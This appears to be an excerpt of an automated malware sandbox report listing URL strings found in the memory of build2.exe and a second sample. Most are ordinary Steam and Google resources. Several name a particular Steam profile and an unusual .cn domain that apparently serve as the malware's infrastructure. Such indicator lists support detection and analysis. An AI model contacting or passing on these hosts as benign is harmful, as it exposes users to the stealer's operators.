Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=ZVlkBFZXqRp1&l=e
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: sIQywRNC5M.exe, 00000005.00000003.2126068659.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/react-native-community/react-native-netinfo
Source: build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: sIQywRNC5M.exe, 00000005.00000003.2121629754.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
Source: craw_window.js.5.dr	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: craw_window.js.5.dr	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: build2.exe, 00000008.00000002.2111977790.0000000003580000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
Source: build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888%0
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000827000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000827000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888:
Source: build2.exe, 00000008.00000002.2111977790.0000000003580000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
